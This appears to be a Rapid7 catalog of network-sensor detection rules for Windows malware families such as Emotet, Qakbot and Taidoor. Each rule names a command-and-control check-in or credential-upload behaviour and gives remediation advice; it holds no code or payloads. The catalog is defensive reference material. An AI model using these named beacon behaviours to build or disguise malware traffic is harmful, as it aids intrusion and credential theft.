MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Emotet.v4 Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/FakeAlert Fake Security Tool Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.FakeEzQ.kr Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Farfli.BHQ!tr Dropper CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Farfli.BHQ!tr Dropper CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Ferret DDOS Bot CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Fin4.InfoStealer Uploading User Credentials CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/FloatingCloud.Banker CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Fsysna.Downloader CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Fullstuff Initial Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Gagolino Banking Trojan Reporting to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/GamesForum.InfoStealer Reporting to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/GameThief Initial CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Gaudox Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/GCman.Backdoor CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32.Geodo/Emotet Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.Geodo/Emotet Checkin Fake 404 Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Goolbot.E Checkin UA Detected iamx

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/HelloBridge.Backdoor Login CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/HelloBridge.Backdoor Register CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Hesperus.Banker Nlog.php Variant Sending Data To CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Hesperus.Banker Tr-mail Variant Sending Data To CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Hicrazyk.A Downloader Install CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Hupigon.B User Agent TSDownload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Hyteod.Downloader CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/InstallMonster.Downloader Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Iyus.H Initial CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Iyus.H work_troy.php CnC Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Karagany.Downloader CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Kazy.325252 Variant CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Kazy.325252 Variant CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Kazy User-Agent (Windows NT 5.1 ; v.) space infront of semi-colon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Kbot.Backdoor Variant CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Ke3chang.BMW.APT Campaign CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Ke3chang.Dream.APT Campaign CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Ke3chang.MovieStar.APT Campaign CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Ke3chang.MyWeb.APT Campaign CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Ke3chang.MyWeb.APT Eourdegh Campaign CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Ke3chang.Snake.APT Campaign CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/KeyLogger.ACQH!tr Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Kimsuky Sending Encrypted System Information to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Koobface Variant Checkin Attempt

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Lalus Trojan Downloader Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Lalus Trojan Downloader User Agent (Message Center)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/LetsGo.APT Sleep CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Lici Initial Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Liftoh.Downloader Feed404 CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Liftoh.Downloader Get Final Payload Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Liftoh.Downloader Images CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Lile.A DoS Outbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/LockscreenBEI.Scareware Cnc Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Madness Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Mepaow.Backdoor Initial Checkin to Intermediary Pre-CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Mevade.Variant CnC POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Mnless Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.Nemim Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/NetShare User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.Netwire Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Neverquest.InfoStealer Configuration Request CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Nolja Trojan Downloader Initial Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Nolja Trojan User-Agent (FileNolja)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Numnet.Downloader CnC Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Numnet.Downloader CnC Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Nutiliers.A Downloader CnC Checkin - Request Encrypted Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Nymaim Checkin (2)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Patchwork.Backdoor CnC Check-in M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Patchwork.Backdoor Communicating with CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Pgift.Backdoor APT CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/PointOfSales.Misc CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/PointOfSales.Misc CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Pterodo.CL CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Pterodo CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.Qakbot Request for Compromised FTP Sites

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.Qakbot Update Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.Qakbot Webpage Infection Routine POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Quasar 1.3/Venom RAT Connectivity Check 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Renos.Downloader User Agent zeroup

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Rovnix Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Rshot.Backdoor File Upload CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Safe User Agent Fantasia

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the full HTTP request and confirm which process on the host sent it, since User-Agent signatures can match unusual but legitimate clients. If the traffic is malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Scar Downloader Request

Description

This detection identifies a download request issued by the W32/Scar downloader to retrieve additional malware, as observed by Rapid7’s Insight Network Sensor. Malicious actors use downloaders of this kind to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/SecVerif.Downloader Initial Checkin

Description

This detection identifies the initial check-in of the W32/SecVerif downloader with its command-and-control server, as observed by Rapid7’s Insight Network Sensor. Malicious actors use downloaders of this kind to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/SecVerif.Downloader Second Stage Download Request

Description

This detection identifies the W32/SecVerif downloader requesting its second-stage payload, as observed by Rapid7’s Insight Network Sensor. At this point the host has already run the first stage; malicious actors use downloaders of this kind to gain access to victim organizations.

Recommendation

Review the alert in question. The second-stage payload may already have been retrieved and run, so removing the downloader alone is not sufficient; rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/ServStart.Variant CnC Beacon

Description

This detection identifies a command-and-control beacon from a variant of the W32/ServStart malware family, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Siggen.Dropper CnC Beacon

Description

This detection identifies a command-and-control beacon from the W32/Siggen dropper, as observed by Rapid7’s Insight Network Sensor. Droppers of this kind install further malware on the host; malicious actors use them to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Skintrim CnC Checkin

Description

This detection identifies a command-and-control check-in by the W32/Skintrim malware, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Snojan.BNQKZQH CnC Activity

Description

This detection identifies command-and-control activity from the W32/Snojan.BNQKZQH trojan, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Snojan.BNQKZQH User-Agent

Description

This detection identifies HTTP requests carrying the User-Agent string used by the W32/Snojan.BNQKZQH trojan, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the full HTTP request and identify the sending process on the host, since User-Agent signatures can match unusual but legitimate software. If the traffic is malicious, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/SPARS/ARS Stealer Checkin

Description

This detection identifies a check-in from the W32/SPARS (ARS) information stealer with its command-and-control server, as observed by Rapid7’s Insight Network Sensor. Stealers of this kind harvest credentials and other data from the host; malicious actors use them to gain access to victim organizations.

Recommendation

Review the alert in question. If infection is confirmed, rebuild the host from a known, good source and rotate every credential stored or entered on it (browser-saved passwords, mail and VPN credentials), not only the user’s login password.

ET MALWARE W32/SpeedingUpMyPC.Rootkit CnC Beacon

Description

This detection identifies a command-and-control beacon from the W32/SpeedingUpMyPC rootkit, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question. If infection is confirmed, rebuild the host from a known, good source rather than attempting to clean it, since a rootkit can hide its components from host-based tools, and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/SpeedingUpMyPC.Rootkit Install CnC Beacon

Description

This detection identifies the beacon the W32/SpeedingUpMyPC rootkit sends to its command-and-control server during installation, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question. If infection is confirmed, rebuild the host from a known, good source rather than cleaning it in place, as rootkit components may be hidden from host-based tools, and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/SpeedingUpMyPC.Rootkit Successful Install GET Type CnC Beacon

Description

This detection identifies the HTTP GET beacon the W32/SpeedingUpMyPC rootkit sends to report a successful installation to its command-and-control server, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question; this beacon indicates the rootkit installed successfully. Rebuild the host from a known, good source rather than cleaning it in place, and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Spy.KeyLogger.OCI CnC Checkin

Description

This detection identifies a command-and-control check-in by the W32/Spy.KeyLogger.OCI keylogger, as observed by Rapid7’s Insight Network Sensor. Keyloggers capture everything typed on the host; malicious actors use them to gain access to victim organizations.

Recommendation

Review the alert in question. If infection is confirmed, rebuild the host from a known, good source and rotate every credential entered on it since the infection began, not only the user’s login password.

ET MALWARE W32/StartPage.eba Dropper Checkin

Description

This detection identifies a check-in from the W32/StartPage.eba dropper with its command-and-control server, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/StealRat.SpamBot Email Template Request

Description

This detection identifies the W32/StealRat spambot requesting an email template from its controller, as observed by Rapid7’s Insight Network Sensor. A spambot turns the host into a relay for the operator’s mail campaigns; malicious actors use malware of this kind to gain access to victim organizations and to abuse their resources.

Recommendation

Review the alert in question and check the host’s outbound SMTP activity, since it is likely being used to send spam, which can get the organization’s mail reputation blocklisted. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Symmi.46846 CnC Beacon

Description

This detection identifies a command-and-control beacon from the W32/Symmi.46846 malware, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Symmi Remote File Injector Initial CnC Beacon

Description

This detection identifies the initial command-and-control beacon from the W32/Symmi remote file injector, as observed by Rapid7’s Insight Network Sensor. Malicious actors use malware of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Syndicasec.Backdoor CnC Beacon

Description

This detection identifies a command-and-control beacon from the W32/Syndicasec backdoor, as observed by Rapid7’s Insight Network Sensor. Malicious actors use backdoors of this kind to gain and maintain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Taidoor.Backdoor CnC Checkin With Default Substitute MAC Address Field

Description

This detection identifies a command-and-control check-in by the W32/Taidoor backdoor in which the MAC address field carries the malware’s default substitute value, as observed by Rapid7’s Insight Network Sensor. Taidoor is a backdoor long associated with targeted intrusions; malicious actors use it to gain and maintain access to victim organizations.

Recommendation

Review the alert in question and treat it as a likely targeted intrusion: scope the environment for other hosts contacting the same destination and involve incident response before remediating, so the intruder is not alerted before the full foothold is known. Then rebuild the host from a known, good source and have the user change their password.
